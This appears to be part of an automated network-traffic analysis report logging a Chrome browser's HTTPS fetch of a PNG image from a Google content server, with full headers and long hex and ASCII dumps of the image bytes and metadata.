                                                                                                                                                                                                                                                                                          Data Ascii: 0dCk66%cw5$h/mVdG8,fGN?H31gQ&s|s{i5[2C8@,@a%8g1/gmPYD^ES@++kI`ZyueC]q5RA6t77.`.zsP1wcY~^~~"p$:r`WY<:+
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:39 UTC1390INData Raw: 60 9f 89 70 ed 6f 37 1f c8 25 20 97 ed 43 7b cd bf 5c ec 58 76 7a 20 8e 4e 88 af 8f cd a0 c3 70 17 d4 0c 66 79 45 c0 b4 46 ce 15 3d 74 e5 05 f0 a2 80 4d 4f 44 78 29 da 49 9a 4d a2 71 fc d9 ee c3 f0 ac dc 67 f4 d1 ce c4 74 1c 81 0d 3e 41 58 b7 e1 b3 20 a2 b8 80 5f 31 02 df a2 ad 03 6e 6b 18 15 11 01 ab 57 fc ed f5 f6 e1 de fb dd d0 79 ed f8 bb 5c b0 ff e6 e5 af cf f7 5e be 0c 9d 7d c7 df a1 22 7f 0f 12 07 ab 75 61 f7 5e b2 0e c4 03 56 27 82 72 84 41 cf da 0f 1a 51 b4 25 d8 84 7b 46 b4 09 0c 91 8c 48 c2 71 2f 0b 06 bd ec 68 c6 30 7f 46 10 23 80 4c a6 af f8 58 2e a8 47 bb 16 13 ff 49 e7 42 4e 3c 75 8c fd a2 a5 30 2a 16 9a 2e dc 23 79 16 7b 60 b6 48 9a 38 41 42 6f 36 77 84 3b ee c5 c1 ac e5 0e 7a 58 8b c0 f9 9b e3 b5 62 1f d4 43 e0 67 88 f7 0d 96 4e d9 62 53
                                                                                                                                                                                                                                                                                          Data Ascii: `po7% C{\Xvz NpfyEF=tMODx)IMqgt>AX _1nkWy\^}"ua^V'rAQ%{FHq/h0F#LX.GIBN<u0*.#y{`H8ABo6w;zXbCgNbS
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:39 UTC1390INData Raw: 0f 1b 12 84 34 c4 e5 40 88 21 3b aa 18 b5 86 63 d0 27 6c 67 65 5d 64 6c 56 b8 79 38 68 a5 1e 94 e0 8c a9 93 40 f3 ec 28 07 75 62 f0 b1 a6 4c d8 97 9b 30 ba a9 99 34 1c c0 34 19 af ca ea 51 98 b6 12 1f 8d a4 ad 8c 1b e9 cd c8 40 a6 16 b4 6b 87 0a d8 20 4d c3 71 37 dd 42 cd 56 d2 4d 57 57 3d e5 fa 99 1d a5 ab 88 0a b3 e9 8d 3e 93 ad 8c 41 36 de a6 3e b6 d0 1b de e5 7e 56 d7 55 4f 88 92 d2 80 bf da 17 1b 50 3c 45 74 d0 1a 1c 97 bb 83 af 1b 5a 48 37 f4 4e 52 6f 98 49 ac 19 f0 bc 08 9f c1 53 5a 4a 15 7f 58 84 e7 85 71 0a fb 53 fe 0a 4c 70 18 4f 44 97 9c be f4 be 0b 87 0b dc c8 70 a2 39 7b 09 cc 5b 78 c5 a9 d8 59 59 f9 c1 3d 07 30 ad f7 54 49 f0 38 55 b2 86 e9 4c 73 ad 20 e7 f4 d0 7e 12 54 5b 86 82 60 f0 d9 2f 34 e2 26 27 75 1d 2e 92 c6 f0 39 b9 7e 26 e6 e5 28
                                                                                                                                                                                                                                                                                          Data Ascii: 4@!;c'lge]dlVy8h@(ubL044Q@k Mq7BVMWW=>A6>~VUOP<EtZH7NRoISZJXqSLpODp9{[xYY=0TI8ULs ~T[`/4&'u.9~&(
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:39 UTC1390INData Raw: 87 de 29 9e 05 b6 8e 13 2c f3 95 d4 94 a8 c5 26 7b 84 78 01 65 ea 22 b4 a6 3e 21 48 a0 df c4 52 c5 6a a3 d3 b9 ce db 49 b0 37 20 2f 6b 59 b5 53 79 41 9a 6a 50 1e 21 79 60 32 2d 28 3f 0e 11 3a f6 d1 cc 32 70 7f 9a ac b2 e3 8d 02 ff 5a 38 43 c0 a2 7f 77 1b b3 3a 2c 30 df 1f dc 25 3d 52 ca fc 4a 04 5a e2 fa 52 13 1e 30 5e 20 67 3d c7 cd 29 6c 04 c0 47 1a 44 69 48 67 cd 69 15 2d fa ab 5e 35 c4 0d 61 58 8e 08 ea 42 0e 01 30 0e de 12 6a 80 92 b3 2e 0a af b7 a7 74 14 48 15 39 5c c0 d0 8b ba fa b5 c4 51 71 be c3 c1 b6 03 08 c2 68 48 19 ac d0 92 2f 8a f0 2b be 2d f2 43 ab 71 22 5e ff 1a be 2c 90 90 09 da 91 c3 0e 9b cd f0 f9 9e 34 e8 21 0c 11 ce 43 bb cf 2d 7c 20 b9 c3 4e ca 6c ae 33 6d 16 a0 3a 34 aa 7b 90 33 27 f2 e9 21 e0 14 b0 f7 62 5e 81 a3 cc 61 cb ae ea e6
                                                                                                                                                                                                                                                                                          Data Ascii: ),&{xe">!HRjI7 /kYSyAjP!y`2-(?:2pZ8Cw:,0%=RJZR0^ g=)lGDiHgi-^5aXB0j.tH9\QqhH/+-Cq"^,4!C-| Nl3m:4{3'!b^a
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:39 UTC1390INData Raw: 1f 3e e4 68 8d 5e 1b d2 6b 05 96 c6 1a 3a 0e 28 2a 02 c8 e1 4f 4b fd 01 34 6b 0f 89 a7 19 96 62 8a 78 99 fa 57 1d b7 42 d0 26 03 6a 45 c2 7f 47 c5 45 5d 2a 92 cb 66 37 6c 2f 49 4b be 2e 63 2c 5e 60 75 0f 9d 48 63 22 d7 88 5d 9a aa 8c a3 9e 6a b8 c5 dd c9 fa 08 7f f1 74 51 47 47 01 b7 d6 71 5a 50 4d 82 de 04 66 b0 9d 9a a4 81 e1 2b ee c6 9b 8b 5a 6a 75 a3 4b 91 46 83 7e cc 73 a4 1d 61 48 19 fe d1 d1 4f 72 71 67 4a 82 4c 40 c8 d5 98 99 dc 97 65 60 bd d6 96 34 8e 0d 9f 90 34 22 31 11 e0 93 94 44 57 c9 42 ec fc 53 b2 78 78 50 8a 21 34 a3 c9 57 8a 9a 92 35 b4 ef d0 b2 33 da a3 2c 9d 4d 71 5e 30 0a 9c c7 0e 1c f2 08 30 3c 26 9a c3 11 39 4d ef 48 2a bb b7 19 6d 49 61 75 99 84 ce bd 0e 39 8f c1 f0 e6 15 74 8a 97 3a 90 08 27 72 9c aa 2e 0a 0e 30 ce 26 9e 1f 9d 24
                                                                                                                                                                                                                                                                                          Data Ascii: >h^k:(*OK4kbxWB&jEGE]*f7l/IK.c,^`uHc"]jtQGGqZPMf+ZjuKF~saHOrqgJL@e`44"1DWBSxxP!4W53,Mq^00<&9MH*mIau9t:'r.0&$
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:39 UTC1390INData Raw: b7 c2 81 92 bb 13 ff d2 6b ed 61 99 2e 5b 9f f4 04 b5 6b b3 df 32 6f 79 73 ac 95 32 e0 1a 11 0c 76 d6 f2 e4 40 96 03 8f c2 ac 05 5b 9a 4f 76 c1 5c d3 79 53 80 09 1f 13 ad 64 cc 44 e0 a3 85 e3 18 33 84 69 37 0e 5f 42 23 29 5e c9 fd b1 c5 f9 94 15 c9 d4 33 ee e6 f0 c7 21 59 05 17 5e b0 bc c7 ed 0e de f5 00 01 73 e2 62 49 f3 f8 d4 e5 92 15 5d d2 10 b2 e0 9f 4d 41 a2 e6 8c ec 33 4f 3e fb 66 e9 59 a4 9e 6c 3a c1 18 27 a4 72 55 05 e9 e5 eb 38 29 22 29 16 11 de 08 c1 f9 80 08 67 10 b6 72 da 40 4a 73 1b e8 10 17 9f a9 18 6c cd e4 f0 cf c2 7d 10 eb 1a 14 99 5e 09 99 13 57 04 67 f0 48 2a 99 82 ea f1 d1 19 4c c7 9e 99 24 0e 98 c9 a2 96 5d 54 cc c7 78 73 40 19 63 8a db 0d b1 8d 49 77 8f 01 f3 00 8f 24 85 7c 96 58 9f 73 86 81 01 df 2e 9a 28 4f 29 1e c6 34 e5 ff 66 09
                                                                                                                                                                                                                                                                                          Data Ascii: ka.[k2oys2v@[Ov\ySdD3i7_B#)^3!Y^sbI]MA3O>fYl:'rU8)")gr@Jsl}^WgH*L$]Txs@cIw$|Xs.(O)4f
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:39 UTC1390INData Raw: 27 2b ce b1 7b ed 68 68 1e f3 7e 9b 7d f0 1d d9 46 1f a8 9e 1a a9 de 5e 01 97 32 80 65 85 3f 4c 7b cf d2 89 ee 51 36 49 2b e1 3b 13 1a 3a ae 50 44 76 85 1d 32 c0 11 c6 0e 3c d4 4d 64 d5 43 28 6d 85 f7 ef 6f 20 c4 60 f1 dd 5d ed 16 e9 6c 70 c6 d1 57 bb 61 10 3f 50 4e 91 4e 91 7b 38 8d 70 16 90 af 85 fc ab 63 1e e0 cc cf 27 bb 59 28 50 08 33 8c 79 1d 3e 5b fe bc 3c 54 b8 0a 46 23 24 ec 65 be a3 ea c3 51 a3 58 a8 6e c9 2a ef f3 55 96 35 d5 32 da 98 df d2 74 f2 26 d9 a1 41 81 51 94 2a e7 27 38 64 43 0f 41 38 38 84 6f 7a a3 3a 4f 99 12 e8 0c 82 d9 da f6 69 ac 8b e9 28 9c 3c 24 82 c3 99 96 a0 82 44 bb e5 75 62 69 e0 05 98 89 d6 1b 6a 6c ae b7 55 2d 47 db 3c ac 14 fe 46 48 35 70 8e 37 8f 21 5c 90 fa 38 7e 3a 3b 81 4c a0 dd 8f 17 37 0a 27 bb 17 8b 90 e3 f6 57 37
                                                                                                                                                                                                                                                                                          Data Ascii: '+{hh~}F^2e?L{Q6I+;:PDv2<MdC(mo `]lpWa?PNN{8pc'Y(P3y>[<TF#$eQXn*U52t&AQ*'8dCA88oz:Oi(<$DubijlU-G<FH5p7!\8~:;L7'W7
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:39 UTC1390INData Raw: 74 41 67 cd 4b 68 51 85 b3 75 6b 2e b9 85 97 96 a0 5c 96 d2 ad ff 6c fb b6 4f 0d 10 3e 4c 9f c5 e7 fb f1 a5 18 c3 49 a4 dd 41 45 fb 52 66 10 28 ca 6d 5f ae 2e 52 3c fc 1f d8 86 f6 55 f5 bd ab e5 f7 08 6e e0 96 79 fe eb be 86 00 7a 67 f9 a5 2c b7 94 80 22 b4 fd 76 dc e1 a4 fa ab 0e a0 7f c9 7a f0 c2 29 5e 58 7c c3 98 aa ea c5 18 36 32 a3 40 02 27 5f ab 83 73 76 b8 9a c2 7a 59 7b 5e 22 98 8d c0 ae 92 21 be d2 c2 b6 fd 9e ae 2c 87 07 f7 17 a2 39 92 c8 a5 c5 21 7d 5e 5c a2 7c 2b 56 89 62 04 29 59 28 bb 54 a1 3e 3d f7 0a 92 65 74 cb e2 93 74 9d f6 97 f1 c1 55 e5 27 c3 e6 d3 e4 97 48 c4 b8 2a ad a5 36 02 d3 26 35 f9 db 1a b8 1e 59 66 82 59 ae 36 c5 d6 95 06 ec 9a b7 48 91 6a cf 4a 96 d8 f5 e0 fe bb b3 b7 69 bf 5a a3 b2 2a 77 d6 ae bc 5d 69 49 7a 49 6a 1a d0 be
                                                                                                                                                                                                                                                                                          Data Ascii: tAgKhQuk.\lO>LIAERf(m_.R<Unyzg,"vz)^X|62@'_svzY{^"!,9!}^\|+Vb)Y(T>=ettU'H*6&5YfY6HjJiZ*w]iIzIj
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:39 UTC1390INData Raw: 66 b8 28 26 d1 94 ae 11 c8 8f 0a 85 64 e9 db de d0 f5 8e f5 9b 74 0b aa a9 2f 3f c0 bb 58 f6 66 4d 10 fe 0b e4 24 53 b2 90 5a 0a fc 2a 03 f6 d9 2a 80 50 17 58 38 6c 2d a5 07 d1 ef 4a f5 e9 04 cc ed 81 e3 db 56 23 1e 22 f0 51 cd 8f 40 bb 14 fc 24 bb c2 f3 8e 0d 62 4b 93 5b e3 c1 5a 7d 0b a8 6f 8d 9b 16 d4 b7 58 02 ce 82 8d 4e a2 3a 83 f9 4b b2 31 b0 4d a1 6c bc ac 10 35 93 4c f9 62 2d 76 50 1c 66 8c 39 06 0f 36 72 63 d8 80 79 52 44 18 99 0a d5 47 94 16 a7 67 a4 ec 66 22 d3 92 e0 94 d6 e7 fb c3 96 49 4f b6 5a 5d ef b2 2e 25 5c c9 fe ca 32 e3 b6 29 a7 65 f9 69 34 b7 94 61 da 5b 42 d3 66 a7 6c 86 5f 82 6a 6c 0c 37 25 53 28 e5 a6 51 0c f2 e8 f5 bc ad 9d 2c 05 af 76 73 77 69 33 6d ac 6b bd 42 69 a3 bc 9c ba 6d 36 22 0b be 8e fb 99 cc 94 67 51 e4 5e c3 71 2f e3
                                                                                                                                                                                                                                                                                          Data Ascii: f(&dt/?XfM$SZ**PX8l-JV#"Q@$bK[Z}oXN:K1Ml5Lb-vPf96rcyRDGgf"IOZ].%\2)ei4a[Bfl_jl7%S(Q,vswi3mkBim6"gQ^q/


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          100192.168.2.749875142.250.184.2254435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:39 UTC794OUTGET /wtw1KX4QKxdb9HbcQHRw4WsP88O76isYP8JmYFcVpXjHy0tckXFnms1Hgm8jbw8cY53Mx7b-x28HuQkP3nszcom9PGbKiLK1EKkSiqmb=w2000 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: lh3.googleusercontent.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://recovertogether.withgoogle.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="unnamed.png"
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                          Content-Length: 1218685
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:10:01 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 28 Sep 2024 14:10:01 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                                                                          Age: 1899
                                                                                                                                                                                                                                                                                          ETag: "v1"
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC856INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 02 d0 08 06 00 00 00 cf 7d dd 56 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 f6 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 25 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 98 87 69 00 04 00 00 00 01 00 00 00 ac 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 41 64 6f 62 65 20 41 66 74 65 72 20 45 66 66 65 63 74 73 20 32 30 32 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 00 32 30 32 32 3a 30 39 3a 30 38 20 31 36 3a 35 33 3a 35 34 00 00 04 90 04 00 02 00 00 00 14 00 00 00 e2 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR}VsRGBeXIfMM*bj(1%r2iHHAdobe After Effects 2020 (Macintosh)2022:09:08 16:53:54
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 70 68 6f 74 6f 73 68 6f 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 70 68 6f 74 6f 73 68 6f 70 2f 31 2e 30 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 36 35 35 33 35 3c 2f 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 31 39 32 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 59 44 69 6d 65 6e 73 69 6f 6e 3e 31 30 38 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 59 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: obe.com/xap/1.0/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"> <exif:ColorSpace>65535</exif:ColorSpace> <exif:PixelXDimension>1920</exif:PixelXDimension> <exif:PixelYDimension>1080</exif:PixelYDimension>
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 20 20 20 20 3c 2f 72 64 66 3a 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 72 64 66 3a 53 65 71 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 78 6d 70 4d 4d 3a 48 69 73 74 6f 72 79 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 78 6d 70 2e 64 69 64 3a 30 65 33 64 64 34 64 39 2d 37 66 63 34 2d 34 37 31 65 2d 61 33 31 38 2d 65 37 61 35 38 32 63 38 63 37 64 30 3c 2f 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 34 31 30 36 30 32 36 34 2d 32 39 61 38 2d 63 36 34 39 2d 61 65 35 66 2d 65 31 63 34 32 33 62 65 33 64 37 32
                                                                                                                                                                                                                                                                                          Data Ascii: </rdf:li> </rdf:Seq> </xmpMM:History> <xmpMM:OriginalDocumentID>xmp.did:0e3dd4d9-7fc4-471e-a318-e7a582c8c7d0</xmpMM:OriginalDocumentID> <xmpMM:DocumentID>adobe:docid:photoshop:41060264-29a8-c649-ae5f-e1c423be3d72
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: c6 6a bd 2d ae ed ad 42 36 89 b1 76 a6 6d 77 fd b0 b1 b4 b5 52 6c fd c2 bc 2f 9e 1e 69 2c 28 51 ed 2b c3 b9 44 3d 8d 07 e9 9f 5f d0 01 b5 b6 7d e5 01 98 d7 65 be f8 f8 1e cd bf 3d 13 b3 e0 5b 67 dc d4 f6 ef d1 59 be d1 53 a9 4f c0 b0 c9 be f6 f1 ae 45 d1 56 d6 d4 55 8f 7a c2 eb 6d 6a fb e9 fb ea 14 fc e9 93 07 6d fc 41 ac 30 3e 0d bb 30 71 4c 31 29 41 3f 64 de 54 0f 78 ad fd 6f 4f 8e 4f 67 9c 75 68 07 57 7b 2e b1 1d 59 ca 01 f7 03 24 e5 ec f8 03 04 58 fd 26 5d 9a 4f 19 63 0e 55 49 c6 8d c9 71 57 9a 95 11 da 4b 9f b2 6e ed 58 1b bd eb 4f fb ba 29 57 6d 01 1e 7b 22 8f f6 53 fe f7 1f bc fe cb b7 6f df 69 a7 67 7c 4f d9 16 7f 07 f7 e5 b7 ef 19 11 d3 6e df 5f 18 c7 be 33 ce 30 9e 49 27 57 70 f4 d3 8b 77 e2 55 9d b5 99 5b e4 2b 3b fd 92 36 d7 3f ca df d8 41 50
                                                                                                                                                                                                                                                                                          Data Ascii: j-B6vmwRl/i,(Q+D=_}e=[gYSOEVUzmjmA0>0qL1)A?dTxoOOguhW{.Y$X&]OcUIqWKnXO)Wm{"Soig|On_30I'WpwU[+;6?AP
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: d8 67 b6 47 e7 a6 be fe 73 92 22 67 3f 89 bd 5e a0 e3 e5 80 6a 5d 30 87 9f 83 a2 13 aa 83 78 37 48 e2 77 f0 27 72 2e 3c cb e3 5e 83 1d e8 84 cb 52 1d d4 e9 85 c3 07 ed c8 b4 6a 59 38 7f 4e f8 7f 25 c9 eb 8c db 70 bf 94 cb e9 e7 ef 4c 9a aa 0d 2e ff 87 ce 96 1d 54 37 65 42 b1 3c 73 d3 13 ca 98 f5 30 15 e7 64 82 73 30 ce 82 4e 46 24 65 ab f7 77 16 15 da e2 42 44 be 1a eb e1 9f 7d 3e fe 5b 7f ab 48 d2 29 d7 e2 45 8d 56 73 0d 26 3c 5c 1c 64 12 82 ef 2e 78 0c 04 39 1c f6 c7 71 cb bb 2c b6 4e 1b 2a 0d dd ac 4a f3 15 b7 8b d1 d1 51 7f 94 6b 6c 8d 5f 63 67 63 26 76 49 7f 51 7d 7d af fe bb c1 13 a5 a9 b1 f4 19 be f5 5f df d5 ae f6 e9 87 ea ba b2 a4 ba e6 ab 97 b2 8a f7 88 6b f1 6b 87 8c 2d 3f b3 11 d1 f1 2e b2 4c 59 74 4e 5d ca d8 ee 78 70 c8 52 a1 07 29 0b 49 e0
                                                                                                                                                                                                                                                                                          Data Ascii: gGs"g?^j]0x7Hw'r.<^RjY8N%pL.T7eB<s0ds0NF$ewBD}>[H)EVs&<\d.x9q,N*JQkl_cgc&vIQ}}_kk-?.LYtN]xpR)I
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 4f 68 9b 95 7e f0 03 b2 0a 9d 24 ff cb 72 f7 b6 ac 8d f7 0a a9 f2 9e 36 df 7a e5 16 33 3e 5c 04 0d 35 b8 fe 46 52 9e ba 65 e0 e7 9e 3c 5e f5 9e 43 30 79 fe 5d fe 32 ff 95 5a 5b c7 3d 8b ac 69 3b 17 0a 4e 0f cc 11 98 95 e1 7c 06 49 27 44 16 87 3e 45 f1 ca 0a 56 3a 69 46 5f 75 5e 91 89 8b a0 70 51 0d f0 5c 1c 66 22 d3 9e 02 03 df 4d ba eb b0 3c 89 c7 84 ab cd 99 b0 b8 67 31 81 2c 65 27 09 83 05 ec 72 61 c8 8a 99 b3 7e 4a 2c ae 88 e8 03 9e ba 81 cc 5d 21 e4 59 28 9a ec b7 37 93 68 d1 52 d7 4b e3 b8 71 5e 3b ce ca fa a6 6a 2d 06 b5 33 39 ad 4c f1 d7 37 59 f4 23 23 34 25 6c cf 21 af 8f b2 5d ca e1 43 88 c0 b3 6f 41 3f 57 73 be cb e7 46 d5 03 80 f2 69 bc 04 45 3f f3 17 5e d8 ea c2 c9 45 93 e5 6b ba 2b a6 2a 18 11 06 bd 0b 67 a0 d9 80 82 5c eb ea 0b 91 d7 8e 71
                                                                                                                                                                                                                                                                                          Data Ascii: Oh~$r6z3>\5FRe<^C0y]2Z[=i;N|I'D>EV:iF_u^pQ\f"M<g1,e'ra~J,]!Y(7hRKq^;j-39L7Y##4%l!]CoA?WsFiE?^Ek+*g\q
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 76 a1 71 cc 5c e7 7e df 60 ba 1a bb 3c ae 77 f9 d9 f1 92 0c 18 32 87 0c 0a c9 4f 7d 07 45 1b b1 15 36 8e f5 91 e1 a8 6f 02 20 97 d4 1d 8c 5a b5 3a 59 da fc c9 7f e8 8b fa a7 ae 2b 37 f2 d6 86 a1 5c fe 16 c5 33 d9 7d d7 61 42 4e f5 90 fd 40 7c 70 06 29 37 f8 3c 39 f1 eb a7 19 9c e5 d2 81 44 b0 83 c4 03 46 ca 35 c5 bf b7 f5 f5 60 ab ff 77 ba c6 b7 a3 f3 79 73 e1 e3 00 76 da 60 ce 0e d8 77 39 4f 0b 16 47 3e eb 7f 7d 28 7e 5e c3 63 dc 7b c3 53 2e 4b 63 7e 53 27 76 df b9 ec 26 05 a4 4e 34 33 71 1e 0d 3a ed bd 74 bf be b7 05 b2 19 40 99 5f b6 07 f5 c6 9a 4f 6a b4 dd ab a7 93 4f 3e f6 12 cb 52 c5 60 0b 8e 8b 63 74 b5 5f c6 5c 8d 35 a3 7e 63 bf 7e cb f9 0e 9d 2b 4f 5d 47 86 dc 95 e4 dd 4b ae d0 38 a8 6b 7b 27 22 f6 09 c0 22 62 30 c1 83 59 d1 bb a1 74 53 6d f2 2a
                                                                                                                                                                                                                                                                                          Data Ascii: vq\~`<w2O}E6o Z:Y+7\3}aBN@|p)7<9DF5`wysv`w9OG>}(~^c{S.Kc~S'v&N43q:t@_OjO>R`ct_\5~c~+O]GK8k{'""b0YtSm*
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: b0 72 a2 92 9f 1f fb 07 21 6f 2a c1 29 63 9f b2 c2 35 a4 b9 08 b9 4f e1 0f 9e 12 ed 1b 7e 12 2c 6f 26 d2 32 da 62 6a 9f 5a 5d f4 8f 32 53 c3 85 f9 8c 3f 20 58 cd ab 15 a9 0f 8a 68 f7 09 45 36 2e e3 93 e8 5a fe d6 a4 8f 5e 88 13 4b f2 78 64 80 f8 4e 64 77 a9 e3 3f ed 02 6f 5f ab 6f e4 0d a3 83 ef 1d ad 45 f5 b3 55 55 6d f1 4a fb 19 d9 51 48 5f e5 eb 4f a0 2b bd de f8 75 92 ef f2 54 5f d3 96 cd 0b d1 32 77 56 9b ae f5 0b 3b 68 01 1c f5 f0 fb 95 7c f1 d6 9d 6b df f2 fb e5 7d 89 7e 89 34 3e 7b a0 c0 ea 17 99 53 9f 87 b2 54 e7 46 e5 25 4e 03 20 6d 1c b4 5a af 1e b9 db 4a 93 fe 92 31 4b f4 e0 ae f8 e5 da 8e b0 a5 bd 3f 20 fa 12 e4 60 61 10 9e 0d fe 15 aa 78 26 fb f6 ba 60 ef d6 64 5c 09 c6 a3 cb c5 83 36 70 4e 5d 4e 3e 5a d4 8d fa 23 da 13 76 b6 05 fc f4 7b fe
                                                                                                                                                                                                                                                                                          Data Ascii: r!o*)c5O~,o&2bjZ]2S? XhE6.Z^KxdNdw?o_oEUUmJQH_O+uT_2wV;h|k}~4>{STF%N mZJ1K? `ax&`d\6pN]N>Z#v{
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 4f 8c 00 0f 8e da 11 6b e4 f5 6b 7d e8 53 c1 fd 98 b5 e2 84 f9 5d ce 51 27 2a 51 20 59 3e c6 35 65 6f 80 58 c7 4b 3a 31 13 17 f2 01 a8 6e 8e 89 a2 5a 5b 79 f8 11 58 a8 88 3d ce 62 53 17 79 43 57 89 a0 84 f3 f0 91 87 0a 82 2d 38 f9 e0 13 37 dc f7 90 32 df 45 29 1e 38 59 13 89 a3 6e 73 97 6b 23 27 9c 74 6f da 35 f6 91 d7 2e 7d 68 f2 06 59 b5 c0 d9 2f f3 91 6a 9d 61 1d 53 0a cd 6f 9c 36 c9 23 31 77 c8 c4 7e aa 72 36 8d 9d 9b 52 a6 20 5d da 81 5c 74 84 5e dd 54 76 e3 21 fb 0b 85 c9 a9 55 dc e3 34 81 64 e1 02 3c df c3 87 3f 9f 5c 4f e4 e9 e1 f2 5f ed 8e 3e 09 8d 6d 61 ff 34 f7 c3 ef 62 45 f1 3c 71 ac 33 d2 3f 89 7b d8 e6 90 9b 37 63 6b 44 47 9d a8 22 1a 49 7b b5 a1 a9 35 29 47 7f a1 57 ec 29 4b 73 d9 d8 24 b6 19 e3 46 9d b0 8a 2f 92 2b 8d ba 57 d2 29 ed a8 7e
